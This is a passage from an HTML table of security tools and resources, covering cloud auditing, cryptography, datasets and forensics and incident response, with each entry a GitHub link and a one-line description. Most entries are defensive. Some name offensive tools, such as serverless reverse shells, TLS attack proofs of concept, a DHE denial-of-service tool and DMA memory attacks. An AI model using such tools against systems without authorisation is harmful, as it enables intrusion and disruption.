href="https://github.com/nccgroup/ScoutSuite">nccgroup/ScoutSuite</a></td> <td>Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments</td> </tr> <tr> <td><a href="https://github.com/Netflix-Skunkworks/diffy">Netflix-Skunkworks/diffy</a></td> <td>Diffy is a digital forensics and incident response (DFIR) tool developed by Netflix's Security Intelligence and Response Team (SIRT).</td> </tr> <tr> <td><a href="https://github.com/Netflix/security_monkey">Netflix/security_monkey</a></td> <td>Security Monkey monitors your AWS and GCP accounts for policy changes and alerts on insecure configurations.</td> </tr> <tr> <td><a href="https://github.com/NetSPI/aws_consoler">NetSPI/aws_consoler</a></td> <td>A utility to convert your AWS CLI credentials into AWS console access.</td> </tr> <tr> <td><a href="https://github.com/NetSPI/MicroBurst">NetSPI/MicroBurst</a></td> <td>A collection of scripts for assessing Microsoft Azure security</td> </tr> <tr> <td><a href="https://github.com/NotSoSecure/cloud-service-enum/">NotSoSecure/cloud-service-enum</a></td> <td>This script allows pentesters to validate which cloud tokens (API keys, OAuth tokens and more) can access which cloud service.</td> </tr> <tr> <td><a href="https://github.com/prevade/cloudjack">prevade/cloudjack</a></td> <td>Route53/CloudFront Vulnerability Assessment Utility</td> </tr> <tr> <td><a href="https//github.com/projectdiscovery/cloudlist">projectdiscovery/cloudlist</a></td> <td>Cloudlist is a tool for listing Assets from multiple Cloud Providers.</td> </tr> <tr> <td><a href="https://github.com/pumasecurity/serverless-prey">pumasecurity/serverless-prey</a></td> <td>Serverless Functions for establishing Reverse Shells to Lambda, Azure Functions, and Google Cloud Functions</td> </tr> <tr> <td><a href="https://github.com/random-robbie/slurp">random-robbie/slurp</a></td> <td>Enumerate S3 buckets via certstream, domain, or keywords</td> </tr> <tr> <td><a href="https://github.com/RhinoSecurityLabs/cloudgoat">RhinoSecurityLabs/cloudgoat</a></td> <td>CloudGoat is Rhino Security Labs' "Vulnerable by Design" AWS deployment tool</td> </tr> <tr> <td><a href="https://github.com/RhinoSecurityLabs/pacu">RhinoSecurityLabs/pacu</a></td> <td>Rhino Security Labs' AWS penetration testing toolkit</td> </tr> <tr> <td><a href="https://github.com/RiotGames/cloud-inquisitor">RiotGames/cloud-inquisitor</a></td> <td>Enforce ownership and data security within AWS</td> </tr> <tr> <td><a href="https://github.com/sa7mon/S3Scanner">sa7mon/S3Scanner</a></td> <td>Scan for open S3 buckets and dump</td> </tr> <tr> <td><a href="https://github.com/salesforce/cloudsplaining">salesforce/cloudsplaining</a></td> <td>Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report with a triage worksheet</td> </tr> <tr> <td><a href="https://github.com/sendgrid/krampus">sendgrid/krampus</a></td> <td>The original AWS security enforcer™</td> </tr> <tr> <td><a href="https://github.com/SecurityFTW/cs-suite">SecurityFTW/cs-suite</a></td> <td>Cloud Security Suite - One stop tool for auditing the security posture of AWS infrastructure.</td> </tr> <tr> <td><a href="https://github.com/soteria-security/365Inspect">soteria-security/365Inspect</a></td> <td>A PowerShell script that automates the security assessment of Microsoft Office 365 environments.</td> </tr> <tr> <td><a href="https://github.com/spacesiren/spacesiren">spacesiren/spacesiren</a></td> <td>A honey token manager and alert system for AWS.</td> </tr> <tr> <td><a href="https://github.com/swimlane/CLAW">swimlane/CLAW</a></td> <td>A packer utility to create and capture DFIR Image for use AWS & Azure</td> </tr> <tr> <td><a href="https://github.com/theflakes/reg_hunter">theflakes/reg_hunter</a></td> <td>Blueteam operational triage registry hunting/forensic tool</td> </tr> <tr> <td><a href="https://github.com/ThreatResponse/margaritashotgun">ThreatResponse/margaritashotgun</a></td> <td>Remote Memory Acquisition Tool for AWS</td> </tr> <tr> <td><a href="https://github.com/ThreatResponse/aws_ir">ThreatResponse/aws_ir</a></td> <td>Python installable command line utiltity for mitigation of host and key compromises.</td> </tr> <tr> <td><a href="https://github.com/toniblyx/prowler">toniblyx/prowler</a></td> <td>Tool based on AWS-CLI commands for AWS account security assessment and hardening, following guidelines of the CIS Amazon Web Services Foundations Benchmark 1.1</td> </tr> <tr> <td><a href="https://github.com/widdix/aws-s3-virusscan">widdix/aws-s3-virusscan</a></td> <td>Antivirus for Amazon S3 buckets</td> </tr> </table> ## Courses <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://github.com/specterops/at-ps">specterops/at-ps</a></td> <td>Adversary Tactics - PowerShell Training</td> </tr> </table> ## Cryptography <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://github.com/Balasys/dheater">Balasys/dheater</a></td> <td>D(HE)ater is a security tool can perform DoS attack by enforcing the DHE key exchange.</td> </tr> <tr> <td><a href="https://github.com/CERTCC/keyfinder">CERTCC/keyfinder</a></td> <td>A tool for analyzing private (and public) key files, including support for Android APK files.</td> </tr> <tr> <td><a href="https://certdb.com">CertDB</a></td> <td>Internet-wide search engine for digital certificates</td> </tr> <tr> <td><a href="https://github.com/Ciphey/Ciphey">Ciphey/Ciphey</a></td> <td>Automatically decode encryptions without a key, decode encodings, and crack hashes</td> </tr> <tr> <td><a href="https://github.com/corkami/pocs/">corkami/pocs</a></td> <td>Proof of Concepts (PE, PDF...)</td> </tr> <tr> <td><a href="https://github.com/mpgn/BEAST-PoC">mpgn/BEAST-PoC</a></td> <td>Poc of BEAST attack against SSL/TLS</td> </tr> <tr> <td><a href="https://github.com/mpgn/Padding-oracle-attack">mpgn/Padding-oracle-attack</a></td> <td>Padding oracle attack against PKCS7</td> </tr> <tr> <td><a href="https://github.com/mpgn/poodle-PoC">mpgn/poodle-PoC</a></td> <td>Poodle (Padding Oracle On Downgraded Legacy Encryption) attack</td> </tr> <tr> <td><a href="https://github.com/mxrch/evilize">mxrch/evilize</a></td> <td>Use md5-collisions to make evil executables looking like a good one.</td> </tr> <tr> <td><a href="https://github.com/salesforce/ja3">salesforce/ja3</td> <td>JA3 is a standard for creating SSL client fingerprints in an easy to produce and shareable way.</td> </tr> </table> ## Data Sets <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://www.splunk.com/blog/2018/05/10/boss-of-the-soc-scoring-server-questions-and-answers-and-dataset-open-sourced-and-ready-for-download.html">BOTS 1.0 Dataset</a></td> <td>The BOTS 1.0 dataset records two attacks perpetrated by a fictitious hacktivist group called po1s0n1vy targeting Wayne Corp of Batman mythology. There are many comic book references in the data; from heroes and villains to “Batman’s” street addresses. Not only does the dataset have many different types of data—everything from Sysmon to Suricata—but there are even file hashes that can be found in Virustotal.com and domains/IPs to hunt for in OSINT tools like PassiveTotal and Robtex!</td> </tr> <tr> <td><a href="https://dataplane.org/">DataPlane.org</a></td> <td>DataPlane.org is a community-powered Internet data, feeds, and measurement resource for operators, by operators. We provide reliable and trustworthy service at no cost.</td> </tr> <tr> <td><a href="https://toolbox.google.com/datasetsearch">Google Dataset Search</a></td> <td>Google Dataset Search</td> </tr> <tr> <td><a href="https://github.com/FiveDirections/OpTC-data">FiveDirections/OpTC-data</a></td> <td>Operationally Transparent Cyber (OpTC) Data</td> </tr> <tr> <td><a href="https://github.com/intel/yarpgen">intel/yarpgen</a></td> <td>Yet Another Random Program Generator</td> </tr> <tr> <td><a href="https://www.kaggle.com/ymirsky/network-attack-dataset-kitsune">Kitsune Network Attack Dataset</a></td> <td>Nine labeled attacks with extracted features and the original network capture</td> </tr> <tr> <td><a href="https://github.com/nimrodpar/Labeled-Elfs">nimrodpar/Labeled-Elfs</a></td> <td>A collection of well labeled ELF binaries compiled from benign and malicious code in various ways. Great for exploring similarity in executables and training various ML models.</td> </tr> <tr> <td><a href="https://securitydatasets.com/introduction.html">Security Datasets</a></td> <td>The Security Datasets project is an open-source initiatve that contributes malicious and benign datasets, from different platforms, to the infosec community to expedite data analysis and threat research.</td> </tr> <tr> <td><a href="http://www.secrepo.com/">SecRepo.com - Samples of Security Related Data</a></td> <td>Finding samples of various types of Security related can be a giant pain. This is my attempt to keep a somewhat curated list of Security related data I've found, created, or was pointed to. If you perform any kind of analysis with any of this data please let me know and I'd be happy to link it from here or host it here. Hopefully by looking at others research and analysis it will inspire people to add-on, improve, and create new ideas.</td> </tr> <tr> <td><a href="https://github.com/sophos-ai/SOREL-20M">sophos-ai/SOREL-20M</a></td> <td>Sophos-ReversingLabs 20 million sample dataset</td> </tr> <tr> <td><a href="https://github.com/splunk/attack_data">splunk/attack_data</a></td> <td>A Repository of curated datasets from various attacks</td> </tr> </table> ## Digital Forensics and Incident Response <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://www.flashbackdata.com/free-forensics-tool-i-file-parser/">$I File Parser</a></td> <td>Free Forensics Tool – \$I File Parser</td> </tr> <tr> <td><a href="https://github.com/3CORESec/Automata">3CORESec/Automata</a></td> <td>Automatic detection engineering technical state compliance</td> </tr> <tr> <td><a href="https://github.com/Accenture/docker-plaso">Accenture/docker-plaso</a></td> <td>Docker container for plaso supertimlining tool</td> </tr> <tr> <td><a href="https://github.com/activecm/BeaKer">activecm/BeaKer</a></td> <td>Beacon Kibana Executable Report. Aggregates Sysmon Network Events With Elasticsearch and Kibana</td> </tr> <tr> <td><a href="https://github.com/activecm/espy/">activecm/espy/</a></td> <td>Endpoint detection for remote hosts for consumption by RITA and Elasticsearch</td> </tr> <tr> <td><a href="https://github.com/ahmedkhlief/APT-Hunter">ahmedkhlief/APT-Hunter</a></td> <td>APT-Hunter is Threat Hunting tool for windows event logs which made by purple team mindset to provide detect APT movements hidden in the sea of windows event logs to decrease the time to uncover suspicious activity</td> </tr> <tr> <td><a href="https://www.alienvault.com/products/ossim">AlienVault OSSIM</a></td> <td>AlienVault OSSIM: The World’s Most Widely Used Open Source SIEM</td> </tr> <tr> <td><a href="https://github.com/andreafortuna/autotimeliner">andreafortuna/autotimeliner</a></td> <td>Automagically extract forensic timeline from volatile memory dump</td> </tr> <tr> <td><a href="https://github.com/ANSSI-FR/bits_parser">ANSSI-FR/bits_parser</a></td> <td>Extract BITS jobs from QMGR queue and store them as CSV records</td> </tr> <tr> <td><a href="https://github.com/ANSSI-FR/bmc-tools">ANSSI-FR/bmc-tools</a></td> <td>RDP Bitmap Cache Parser</td> </tr> <tr> <td><a href="https://github.com/ANSSI-FR/DFIR-O365RC">ANSSI-FR/DFIR-O365RC</a></td> <td>PowerShell module for Office 365 and Azure AD log collection</td> </tr> <tr> <td><a href="https://github.com/aquasecurity/tracee">aquasecurity/tracee</a></td> <td>Linux Runtime Security and Forensics using eBPF</td> </tr> <tr> <td><a href="https://arsenalrecon.com/downloads/">Arsenal Recon Free Tools</a></td> <td>Arsenal Recon Free Tools</td> </tr> <tr> <td><a href="https://github.com/bfuzzy/auditd-attack">bfuzzy/auditd-attack</a></td> <td>A Linux Auditd rule set mapped to MITRE's Attack Framework</td> </tr> <tr> <td><a href="https://github.com/Broctets-and-Bytes/Darwin">Broctets-and-Bytes/Darwin</a></td> <td>This script is designed to be run against a mounted image, live system, or device in target disk mode. The script automates the collection of key files for MacOS investigations.</td> </tr> <tr> <td><a href="https://github.com/bromiley/olaf">bromiley/olaf</a></td> <td>Office365 Log Analysis Framework: OLAF is a collection of tools, scripts, and analysis techniques dealing with O365 Investigations.</td> </tr> <tr> <td><a href="https://github.com/BSI-Bund/RdpCacheStitcher">BSI-Bund/RdpCacheStitcher</a></td> <td>RdpCacheStitcher is a tool that supports forensic analysts in reconstructing useful images out of RDP cache bitmaps.</td> </tr> <tr> <td><a href="https://github.com/carmaa/inception">carmaa/inception</a></td> <td>Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces.</td> </tr> <tr> <td><a href="https://github.com/CCob/BeaconEye">CCob/BeaconEye</a></td> <td>Hunts out CobaltStrike beacons and logs operator command output</td> </tr> <tr> <td><a href="https://www.cerebrate-project.org/">Cerebrate Project</a></td> <td>Cerebrate is an open-source platform meant to act as a trusted contact information provider and interconnection orchestrator for other security tools (such as MISP).</td> </tr> <tr> <td><a href="https://github.com/chrisandoryan/Nethive-Project">chrisandoryan/Nethive-Project</a></td> <td>Restructured and Collaborated SIEM and CVSS Infrastructure. Presented at Blackhat Asia Arsenal 2020.</td> </tr> <tr> <td><a href="https://github.com/cisagov/CHIRP">cisagov/CHIRP</a></td> <td>A forensic collection tool written in Python.</td> </tr> <tr> <td><a href="https://github.com/coinbase/dexter">coinbase/dexter</a></td> <td>Forensics acquisition framework designed to be extensible and secure</td> </tr> <tr> <td><a href="https://github.com/ComodoSecurity/openedr">ComodoSecurity/openedr</a></td> <td>Open EDR public repository</td> </tr> <tr> <td><a href="https://github.com/countercept/chainsaw">countercept/chainsaw</a></td> <td>Rapidly Search and Hunt through Windows Event Logs</td> </tr> <tr> <td><a href="https://github.com/CrowdStrike/automactc">CrowdStrike/automactc</a></td> <td>AutoMacTC: Automated Mac Forensic Triage Collector</td> </tr> <tr> <td><a href="https://github.com/CrowdStrike/Forensics">CrowdStrike/Forensics</a></td> <td>Scripts and code referenced in CrowdStrike blog posts</td> </tr> <tr> <td><a href="https://github.com/CrowdStrike/SuperMem">CrowdStrike/SuperMem</a></td> <td>A python script developed to process Windows memory images based on triage type.</td> </tr> <tr> <td><a href="https://github.com/cryps1s/DARKSURGEON">cryps1s/DARKSURGEON</a></td> <td>DARKSURGEON is a Windows packer project to empower incident response, digital forensics, malware analysis, and network defense.</td> </tr> <tr> <td><a href="https://github.com/cyb3rfox/Aurora-Incident-Response">cyb3rfox/Aurora-Incident-Response</a></td> <td>Incident Response Documentation made easy. Developed by Incident Responders for Incident Responders</td> </tr> <tr> <td><a href="https://github.com/Cyb3rWard0g/HELK">Cyb3rWard0g/HELK</a></td> <td>A Hunting ELK (Elasticsearch, Logstash, Kibana) with advanced analytic capabilities.</td> </tr> <tr> <td><a href="https://car.mitre.org/">Cyber Analytics Repository</a></td> <td>The MITRE Cyber Analytics Repository (CAR) is a knowledge base of analytics developed by MITRE based on the MITRE ATT&CK adversary model.</td> </tr> <tr> <td><a href="https://github.com/CyberDefenseInstitute/CDIR">CyberDefenseInstitute/CDIR</a></td> <td>CDIR (Cyber Defense Institute Incident Response) Collector - live collection tool based on oss tool/library</td> </tr> <tr> <td><a href="https://github.com/D4stiny/PeaceMaker">D4stiny/PeaceMaker</a></td> <td>PeaceMaker Threat Detection is a Windows kernel-based application that detects advanced techniques used by malware.</td> </tr> <tr> <td><a href="https://github.com/DamonMohammadbagher/ETWProcessMon2">DamonMohammadbagher/ETWProcessMon2</a></td> <td>ETWProcessMon2 is for Monitoring Process/Thread/Memory/Imageloads/TCPIP via ETW + Detection for Remote-Thread-Injection etc.</td> </tr> <tr> <td><a href="https://github.com/davehull/Kansa">davehull/Kansa</a></td> <td>A Powershell incident response framework</td> </tr> <tr> <td><a href="https://github.com/deepalert/deepalert">deepalert/deepalert</a></td> <td>Serverless SOAR (Security Orchestration, Automation and Response) framework for automatic inspection and evaluation of security alert</td> </tr> <tr> <td><a href="https://dfir-orc.github.io/">DFIR ORC</a></td> <td>DFIR ORC, where ORC stands for “Outil de Recherche de Compromission” in French, is a collection of specialized tools dedicated to reliably parse and collect critical artefacts such as the MFT, registry hives or event logs. It can also embed external tools and their configurations.</td> </tr> <tr> <td><a href="https://github.com/DFIRKuiper/Kuiper">DFIRKuiper/Kuiper</a></td> <td>Digital Forensics Investigation Platform</td> </tr> <tr> <td><a href="https://info.digitalguardian.com/wingman.html">DG Wingman</a></td> <td>DG Wingman is a free community Windows tool designed to aid in the collection of forensic evidence in order to properly investigate and scope an intrusion.</td> </tr> <tr> <td><a href="https://github.com/dhondta/AppmemDumper">dhondta/AppmemDumper</a></td> <td>Forensics triage tool relying on Volatility and Foremost</td> </tr> <tr> <td><a href="https://github.com/draios/sysdig">draios/sysdig</a></td> <td>Linux system exploration and troubleshooting tool with first class support for containers</td> </tr> <tr> <td><a href="https://github.com/drego85/meioc">drego85/meioc</a></td> <td>Extracting IoC data from eMail</td> </tr> <tr> <td><a href="https://github.com/fireeye/ARDvark">fireeye/ARDvark</a></td> <td>ARDvark parses the Apple Remote Desktop (ARD) files to pull out application usage, user activity, and filesystem listings.</td> </tr> <tr> <td><a href="https://github.com/fireeye/SilkETW">fireeye/SilkETW</a></td> <td>SilkETW & SilkService are flexible C# wrappers for ETW, they are meant to abstract away the complexities of ETW and give people a simple interface to perform research and introspection.</td> </tr> <tr> <td><a href="https://github.com/fireeye/ThreatPursuit-VM">fireeye/ThreatPursuit-VM</a></td> <td>Threat Pursuit Virtual Machine (VM): A fully customizable, open-sourced Windows-based distribution focused on threat intelligence analysis and hunting designed for intel and malware analysts as well as threat hunters to get up and running quickly.</td> </tr> <tr> <td><a href="https://github.com/ForensicArtifacts/artifacts">ForensicArtifacts/artifacts</a></td> <td>Digital Forensics Artifact Repository</td> </tr> <tr> <td><a href="https://github.com/frikky/Shuffle">frikky/Shuffle</a></td> <td>Shuffle: A general purpose security automation platform platform. We focus on accessibility for all.</td> </tr> <tr> <td><a href="https://github.com/FSecureLABS/LinuxCatScale">FSecureLABS/LinuxCatScale</a></td> <td>Incident Response collection and processing scripts with automated reporting scripts</td> </tr> <tr> <td><a href="https://github.com/G-Research/siembol">G-Research/siembol</a></td> <td>An open-source, real-time Security Information & Event Management tool based on big data technologies, providing a scalable, advanced security analytics framework.</td> </tr> <tr> <td><a href="https://github.com/gleeda/memtriage">gleeda/memtriage</a></td> <td>Allows you to quickly query a Windows machine for RAM artifacts</td> </tr> <tr> <td><a href="https://github.com/google/docker-explorer/">google/docker-explorer</a></td> <td>A tool to help forensicate offline docker acquisitions</td> </tr> <tr> <td><a href="https://github.com/google/GiftStick">google/GiftStick</a></td> <td>1-Click push forensics evidence to the cloud</td> </tr> <tr> <td><a href="https://github.com/google/grr">google/grr</a></td> <td>GRR is a python client (agent) that is installed on target systems, and python server infrastructure that can manage and talk to clients.</td> </tr> <tr> <td><a href="https://github.com/google/rekall">google/rekall</a></td> <td>The Rekall Framework is a completely open collection of tools, implemented in Python under the Apache and GNU General Public License, for the extraction and analysis of digital artifacts computer systems.</td> </tr> <tr> <td><a href="https://github.com/google/turbinia">google/turbinia</a></td> <td>Automation and Scaling of Digital Forensics Tools</td> </tr> <tr> <td><a href="https://www.graylog.org/">Graylog</a></td> <td>Built to open standards, Graylog’s connectivity and interoperability seamlessly collects, enhances, stores, and analyzes log data.</td> </tr> <tr> <td><a href="https://github.com/hunters-forge/api-to-event">hunters-forge/API-To-Event</a></td> <td>A repo to document API functions mapped to security events across diverse platforms</td> </tr> <tr> <td><a href="https://github.com/hunters-forge/OSSEM">hunters-forge/OSSEM</a></td> <td>Open Source Security Events Metadata (OSSEM)</td> </tr> <tr> <td><a href="https://github.com/jimtin/IRCoreForensicFramework">jimtin/IRCoreForensicFramework</a></td> <td>Powershell 7 (Powershell Core)/ C# cross platform forensic framework. Built by incident responders for incident responders.</td> </tr> <tr> <td><a href="https://github.com/JPCERTCC/LogonTracer">JPCERTCC/LogonTracer</a></td> <td>Investigate malicious Windows logon by visualizing and analyzing Windows event log</td> </tr> <tr> <td><a href="https://github.com/JPCERTCC/SysmonSearch">JPCERTCC/SysmonSearch</a></td> <td>Investigate suspicious activity by visualizing Sysmon's event log</td> </tr> <tr> <td><a href="https://github.com/IllusiveNetworks-Labs/HistoricProcessTree">IllusiveNetworks-Labs/HistoricProcessTree</a></td> <td>An Incident Response tool that visualizes historic process execution evidence (based on Event ID 4688 - Process Creation Event) in a tree view.</td> </tr> <tr> <td><a href="https://github.com/intezer/linux-explorer">intezer/linux-explorer</a></td> <td>Easy-to-use live forensics toolbox for Linux endpoints</td> </tr> <tr> <td><a href="https://github.com/Invoke-IR/ACE">Invoke-IR/ACE</a></td> <td>The Automated Collection and Enrichment (ACE) platform is a suite of tools for threat hunters to collect data from many endpoints in a network and automatically enrich the data. The data is collected by running scripts on each computer without installing any software on the target. ACE supports collecting from Windows, macOS, and Linux hosts.</td> </tr> <tr> <td><a href="https://github.com/Invoke-IR/PowerForensics">Invoke-IR/PowerForensics</a></td> <td>PowerForensics provides an all in one platform for live disk forensic analysis</td> </tr> <tr> <td><a href="https://github.com/ion-storm/sysmon-edr">ion-storm/sysmod-edr</a></td> <td>Sysmon EDR Active Response</td> </tr> <tr> <td><a href="https://github.com/kacos2000/MFT_Browser">kacos2000/MFT_Browser</a></td> <td>$MFT directory tree reconstruction & record info</td> </tr> <tr> <td><a href="https://securelist.com/happy-ir-in-the-new-year/83557/">Kaspersky IR's Artifacts Collector</a></td> <td>Kaspersky IR's Artifacts Collector</td> </tr> <tr> <td><a href="https://www.brimorlabsblog.com/2019/04/live-response-collection-cedarpelta.html">Live Response Collection - Cedarpelta</a></td> <td>Live Response Collection - Cedarpelta </td> </tr> <tr> <td><a href="https://github.com/log2timeline/plaso">log2timeline/plaso</a></td> <td>log2timeline is a tool designed to extract timestamps from various files found on a typical computer system(s) and aggregate them.</td> </tr> <tr> <td><a href="https://www.magnetforensics.com/resources/magnet-app-simulator/">MAGNET App Simulator</a></td> <td>MAGNET App Simulator lets you load application data from Android devices in your case into a virtual environment, enabling you to view and interact with the data as the user would have seen it on their own device.</td> </tr> <tr> <td><a href="https://github.com/MalwareSoup/MitreAttack">MalwareSoup/MitreAttack</a></td> <td>Python wrapper for the Mitre ATT&CK framework API</td> </tr> <tr> <td><a href="https://github.com/markbaggett/srum-dump">markbaggett/srum-dump</a></td> <td>A forensics tool to convert the data in the Windows srum (System Resource Usage Monitor) database to an xlsx spreadsheet.</td> </tr> <tr> <td><a href="https://github.com/markbaggett/werejugo">markbaggett/werejugo</a></td> <td>Identifies physical locations where a laptop has been based upon wireless profiles and wireless data recorded in event logs</td> </tr> <tr> <td><a href="https://github.com/microsoft/avml">microsoft/avml</a></td> <td>AVML - Acquire Volatile Memory for Linux</td> </tr> <tr> <td><a href="https://github.com/miriamxyra/EventList">miriamxyra/EventList</a></td> <td>EventList is a tool to help improving your Audit capabilities and to help to build your Security Operation Center.</td> </tr> <tr> <td><a href="https://github.com/mitre-attack/bzar">mitre-attack/bzar</a></td> <td>A set of Zeek scripts to detect ATT&CK techniques.</td> </tr> <tr> <td><a href="https://github.com/monnappa22/HollowFind">monnappa22/HollowFind</a></td> <td>Hollowfind is a Volatility plugin to detect different types of process hollowing techniques used in the wild to bypass, confuse, deflect and divert the forensic analysis techniques. The plugin detects such attacks by finding discrepancy in the VAD and PEB, it also disassembles the address of entry point to detect any redirection attempts and als…</td> </tr> <tr> <td><a href="https://github.com/mozilla/audit-go">mozilla/audit-go</a></td> <td>Linux Audit Plugin for heka written using netlink Protocol in golang and Lua</td> </tr> <tr> <td><a href="https://github.com/mozilla/mig">mozilla/mig</a></td> <td>Distributed & real time digital forensics at the speed of the cloud</td> </tr> <tr> <td><a href="https://github.com/mozilla/MozDef">mozilla/MozDef</a></td> <td>MozDef: The Mozilla Defense Platform</td> </tr> <tr> <td><a href="https://github.com/nannib/Imm2Virtual">nannib/Imm2Virtual</a></td> <td>This is a GUI (for Windows 64 bit) for a procedure to virtualize your EWF(E01), DD(Raw), AFF disk image file without converting it, directly with VirtualBox, forensically proof.</td> </tr> <tr> <td><a href="https://github.com/Netflix/dispatch">Netflix/dispatch</a></td> <td>All of the ad-hoc things you're doing to manage incidents today, done for you, and much more!</td> </tr> <tr> <td><a href="https://github.com/nshalabi/SysmonTools">nshalabi/SysmonTools</a></td> <td>Utilities for Sysmon (Sysmon View and Sysmon Shell)</td> </tr> <tr> <td><a href="https://github.com/NVISOsecurity/evtx-hunter">NVISOsecurity/evtx-hunter</a></td> <td>evtx-hunter helps to quickly spot interesting security-related activity in Windows Event Viewer (EVTX) files.</td> </tr> <tr> <td><a href="https://nxlog.co/">NXLog</a></td> <td>The modern open source log collector.</td> </tr> <tr> <td><a href="https://github.com/omenscan/achoir">omenscan/achoir</a></td> <td>Windows Live Artifacts Acquisition Script</td> </tr> <tr> <td><a href="https://github.com/omenscan/achoirx">omenscan/achoirx</a></td> <td>ReWrite of AChoir in Go for Cross PlatformReWrite of AChoir in Go for Cross Platform</td> </tr> <tr> <td><a href="https://github.com/opencybersecurityalliance/kestrel-lang">opencybersecurityalliance/kestrel-lang</a></td> <td>Kestrel Threat Hunting Language</td> </tr> <tr> <td><a href="https://github.com/OpenEx-Platform/openex">OpenEx-Platform/openex</a></td> <td>Open Crisis Exercises Planning Platform</td> </tr> <tr> <td><a href="https://github.com/orlikoski/CyLR">orlikoski/CyLR</a></td> <td>CyLR - Live Response Collection Tool</td> </tr> <tr> <td><a href="https://ossec.github.io/">OSSEC</a></td> <td>Open Source HIDS SECurity</td> </tr> <tr> <td><a href="https://github.com/OTRF/Azure-Sentinel2Go">OTRF/Azure-Sentinel2Go</a></td> <td>Azure Sentinel2Go is an open source project developed to expedite the deployment of an Azure Sentinel lab.</td> </tr> <tr> <td><a href="https://github.com/ovotech/gitoops/">ovotech/gitoops</a></td> <td>GitOops is a tool to help attackers and defenders identify lateral movement and privilege escalation paths in GitHub organizations by abusing CI/CD pipelines and GitHub access controls.</td> </tr> <tr> <td><a href="https://github.com/philhagen/sof-elk">philhagen/sof-elk</a></td> <td>Configuration files for the SOF-ELK VM, used in SANS FOR572</td> </tr> <tr> <td><a href="https://github.com/polylogyx/PolyMon">polylogyx/PolyMon</a></td> <td>PolyLogyx Monitoring Agent (PolyMon) is a Windows software that leverages the osquery tool and the PolyLogyx Extension to osquery, to provide a view into detailed information about process creations, network connections, file system changes and many other activities on the system.</td> </tr> <tr> <td><a href="https://github.com/ptresearch/AttackDetection">ptresearch/AttackDetection</a></td> <td>The Attack Detection Team searches for new vulnerabilities and 0-days, reproduces it and creates PoC exploits to understand how these security flaws work and how related attacks can be detected on the network layer. Additionally, we are interested in malware and hackers’ TTPs, so we develop Suricata rules for detecting all sorts of such activities.</td> </tr> <tr> <td><a href="https://github.com/PUNCH-Cyber/stoq">PUNCH-Cyber/stoq</a></td> <td>An open source framework for enterprise level automated analysis.</td> </tr> <tr> <td><a href="https://github.com/PwC-IR/Office-365-Extractor">PwC-IR/Office-365-Extractor</a></td> <td>The Office 365 Extractor is a tool that allows for complete and reliable extraction of the Unified Audit Log (UAL)</td> </tr> <tr> <td><a href="https://github.com/rajiv2790/FalconEye">rajiv2790/FalconEye</a></td> <td>FalconEye: Real-time detection software for Windows process injections</td> </tr> <tr> <td><a href="https://github.com/refractionPOINT/limacharlie">refractionPOINT/limacharlie</a></td> <td>LC is an Open Source, cross-platform (Windows, MacOS, Linux ++), realtime Endpoint Detection and Response sensor. The extra-light sensor, once installed on a system provides Flight Data Recorder type information (telemetry on all aspects of the system like processes, DNS, network IO, file IO etc).</td> </tr> <tr> <td><a href="https://github.com/RomanEmelyanov/CobaltStrikeForensic">RomanEmelyanov/CobaltStrikeForensic</a></td> <td>Toolset for research malware and Cobalt Strike beacons</td> </tr> <tr> <td><a href="https://rocknsm.io/">ROCK NSM</a></td> <td>Response Operation Collection Kit - An open source Network Security Monitoring platform.</td> </tr> <tr> <td><a href="https://github.com/salesforce/bro-sysmon/">salesforce/bro-sysmon</td> <td>Bro-Sysmon enables Bro to receive Windows Event Logs. This provide a method to associate Network Monitoring and Host Monitoring. The work was spurred by the need to associate JA3 and HASSH fingerprints with the application on the host. The example below shows the hostname, Process ID, connection information, JA3 fingerprints, Application Path, and binary hashes.</td> </tr> <tr> <td><a href="https://github.com/salesforce/jarm">salesforce/jarm</a></td> <td>JARM is an active Transport Layer Security (TLS) server fingerprinting tool.</td> </tr> <tr> <td><a href="https://github.com/sans-blue-team/DeepBlueCLI">sans-blue-team/DeepBlueCLI</a></td> <td>DeepBlueCLI - a PowerShell Module for Threat Hunting via Windows Event Logs</td> </tr> <tr> <td><a href="https://securityonion.net/">Security Onion</a></td> <td>Peel back the layers of your enterprise</td> </tr> <tr> <td><a href="https://github.com/SeAdvisors/dredd">SecurityRiskAdvisors/dredd</a></td> <td>Automated detection rule analysis utility</td> </tr> <tr> <td><a href="https://github.com/SecurityRiskAdvisors/TALR">SecurityRiskAdvisors/TALR</a></td> <td>Threat Alert Logic Repository (TALR) - A public repository for the collection and sharing of detection rules in platform agnostic formats. Collected rules are appended with STIX required fields for simplified sharing over TAXII servers.</td> </tr> <tr> <td><a href="https://github.com/SekoiaLab/fastir_artifacts">SekoiaLab/fastir_artifacts</a></td> <td>Live forensic artifacts collector</td> </tr> <tr> <td><a href="https://github.com/SekoiaLab/Fastir_Collector">SekoiaLab/Fastir_Collector</a></td> <td>This tool collects different artefacts on live Windows and records the results in csv or json files. With the analyses of these artefacts, an early compromission can be detected.</td> </tr> <tr> <td><a href="https://github.com/shellster/DCSYNCMonitor">shellster/DCSYNCMonitor</a></td> <td>Monitors for DCSYNC and DCSHADOW attacks and create custom Windows Events for these events.</td> </tr> <tr> <td><a href="https://siemonster.com/">SIEMonster</a></td> <td>SIEMonster is an Affordable Security Monitoring Software Soulution</td> </tr> <tr> <td><a href="https://sigma.socprime.com/#!/">Sigma Rules Repository Mirror</a></td> <td>Sigma rules repository mirror and translations</td> </tr> <tr> <td><a href="https://github.com/slackhq/go-audit">slackhq/go-audit</a></td> <td>go-audit is an alternative to the auditd daemon that ships with many distros</td> </tr> <tr> <td><a href="https://github.com/s0md3v/Orbit">s0md3v/Orbit</a></td> <td>Blockchain Transactions Investigation Tool</td> </tr> <tr> <td><a href="https://github.com/splunk/melting-cobalt">splunk/melting-cobalt</a></td> <td>A Cobalt Strike Scanner that retrieves detected Team Server beacons into a JSON object</td> </tr> <tr> <td><a href="https://github.com/sumeshi/evtx2es">sumeshi/evtx2es</a></td> <td>A library for fast import of Windows Eventlogs into Elasticsearch.</td> </tr> <tr> 